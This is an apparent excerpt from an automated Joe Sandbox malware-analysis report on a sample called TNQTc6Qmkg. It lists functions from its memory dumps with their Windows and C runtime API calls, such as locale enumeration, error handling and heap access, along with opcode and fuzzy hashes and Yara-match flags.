Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 32d17ad429b821eb3b5254568d795f10feede76321cb620d20f35986bf6bdee7
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 25114C376003019FDB18AF39E8D8A7AB792FF84358B54443EED8647A40D771B582C740

Uniqueness

Uniqueness Score: -1.00%

Function 004201F6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05D10A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,05D107A3,00000000,00000000,?), ref: 05D10A31

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 6b11f7735feb36966b30c6be84678f58e5ae476903c157f31f733d9032311e5a
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: A7F0F932A11115BFDB24EA249C0DBBA776DFB40654F04046AED0AA3140EA74FE81C7D8

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 05D107D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FDF
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05D10829

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: a95b91bc4a97b23d1d9e753169f4f388c5f3ba8bf10227604ec349dd0bb7ea49
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: F1F0A932755109ABDB14BF64DC49EBA77ACDB44310F0001BAE906D7240DE74AD45C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 05D104F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 05D10544

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: 80ffd63348a3a6a82cf15b2c42190f0166e80dc5f9c853428a3101c3100b7a70
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 6DF0C8363003056FEB24AF39AC88A7A7B95FF81758F15446EFD468B540D671D881CA54

Uniqueness

Uniqueness Score: -1.00%

Function 00420291 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 05D0774B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,05D04002,?,00000004), ref: 05D0779E

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: b9513032cb68961f1714f541812cfd3d97ac31708da18c86bac8fccc596a3e24
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: 63F0F031B40218BBDF11AF60EC05F7E3B62EF44B10F90007AFC092A2A0CA719E209699

Uniqueness

Uniqueness Score: -1.00%

Function 05D07358 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 05D01C62: RtlEnterCriticalSection.NTDLL(?), ref: 05D01C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 05D07390

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 8ac4b28a8f6bb4b809cb723afb3773399d2073cb508bfb904288076bd3fa5f9e
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: 56F04F36A50304AFEB14EF68DC49B5D77F0EB04724F10512AF514DB2E0CB7499449B49

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 05D10412 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 05D06F80: GetLastError.KERNEL32(?,?,05CFE697,?,?,?,05CFED94,?), ref: 05D06F84
Part of subcall function 05D06F80: _free.LIBCMT ref: 05D06FB7
Part of subcall function 05D06F80: SetLastError.KERNEL32(00000000), ref: 05D06FF8
Part of subcall function 05D06F80: _abort.LIBCMT ref: 05D06FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 05D10449

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 79c9a37e7464e780d9af9615a6c715c67a6e9966fb354fc9959ee5051ddf3662
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: 0EF05C3530020557CB04AF35EC49B7A7F91FFC1714B46405AEE058B140C6319842C794

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 05CF9E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,05CF95DF), ref: 05CF9E72

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 05CFF6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 05CFF818

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 73593141549bc1491ed2aadfcb8b681d1ec934e572f4620e761828fb93460490
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: C951552171874557EBF889788558BBEB3BAFB03204F180D1FDB43C7291EA05EB858396

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction ID: 30dd4879e0e4f7cbc3ef4d655b8e95e3224648d78b38178bcfd532eea7b5d2d0
Opcode Fuzzy Hash: 08a33e80fad7453357a82acd7fe4e620bf3ed4498dea0d9e25bb497d863b1c5b
Instruction Fuzzy Hash: 05A011302002008BA3208F30AA883083BA8AA802C0B8800BAA808C0030EB308880EA8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041BE39 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction ID: d4ebaa65498674ec5fd033f868b33b9562cf8a9fc909dcd3fe82be6bf65502bb
Opcode Fuzzy Hash: 8fddef10fdd86842ec28559fcc94cc4dbcd094a3d5338bbac31c96d820994743
Instruction Fuzzy Hash: 6F321332E69F014DD7239634CC62376A259AFB73C4F55D737E81AB5AA5EB28C4C34108

Uniqueness

Uniqueness Score: -1.00%

Function 05CFC3F8 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 41a5a4821ded6b00d46ed0d7d22ddadd75a53710a1951b34ae713751e0e8e098
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: EF917A7230D0A74ADBA9863E853447DFFF26A411A170A1B9ED5F3CA1C1EE14CA64D720

Uniqueness

Uniqueness Score: -1.00%

Function 0040C191 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction ID: 5975a2af078c28816f01fe1301a8b7dceccd13c1e98c5dc0dc8573345ea9f6ce
Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
Instruction Fuzzy Hash: 219186722180A38AD72D437984B403FFFE15A513A131A07BFD4F2DA6C1EE38C555A628

Uniqueness

Uniqueness Score: -1.00%

Function 05CFC6B3 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 9426a15e2589ac3317752e9b955604028e83e6c4c6251cb0ad0de7136c5acd57
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 9C91797330C0A74ADBA9823E957447DFFF26A416A170A0F9ED5F2CA1C5EE148A64D720

Uniqueness

Uniqueness Score: -1.00%

Function 0040C44C Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction ID: 21e6ce72fb18376f8c9c0177a15a08f5feb8af2f21d081aaa92a013857dedb9e
Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
Instruction Fuzzy Hash: 0F9179761080A38ADB29473985B403FFFE15A523A131A0BBFD4F2DB2C5EE38D555E624

Uniqueness

Uniqueness Score: -1.00%

Function 05CFC131 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 88c730db5d912d574a9430c2f9eedc255b4057584c5aaa615e7bd36b5f098f0b
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 0A91897330D0A74ADBAD467E847447DFFE26A411A130A5B9ED5F3CB1C1ED14CA689720

Uniqueness

Uniqueness Score: -1.00%

Function 0040BECA Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 69778eac300dd1c10c594cbe57f4f6eadb7335fd5fb69c830af9f3d407440417
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 3F9158722080A389D729477D897447FFFE19A513A131A07BFD4F2DB2C1EE388554DA68

Uniqueness

Uniqueness Score: -1.00%

Function 05CFBE87 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: bf83810307ca11f1d023be32db70834988aba74b1e348633c8d627fa8020c632
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D7816C7620C0974ADB9D863EC57447EFFE26A412A570A0B9DD5F3CB1C1EE148A54DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC20 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 2607aabaea6df519b2dd372ead2d1238015a119bad60f1980fa744d4abdc4045
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: D38186722080A34AEB294639847447FFFE1DE513A131A07BFD4F2DA2C1EF38855596AC

Uniqueness

Uniqueness Score: -1.00%

Function 042654B3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4265000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 441296fa5ed0d504f78c67fdd07c3bb3c71b614ad3173afac16f75cbf9a9e0ff
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 9A118E72350100AFD754DF55EC84FA673EAEB89360B2980A9ED09CB312E676F881C760

Uniqueness

Uniqueness Score: -1.00%

Function 05CF0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: e92caf5c816a141ceabdb1f17ef2cc41dfdf7b1c85e2e71085a04d07197218ec
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 8701A7766016049FDF61CF24C908FBA33E5FB85716F4548A5DA07A7242E774A941CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05D021D1 Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 05D02241
_free.LIBCMT ref: 05D02257
_free.LIBCMT ref: 05D02268
_free.LIBCMT ref: 05D02279
_free.LIBCMT ref: 05D02290
GetCPInfo.KERNEL32(?,?), ref: 05D022D8

Part of subcall function 05D0B3B5: _free.LIBCMT ref: 05D0B420

_free.LIBCMT ref: 05D02484
_free.LIBCMT ref: 05D02497
_free.LIBCMT ref: 05D024A5
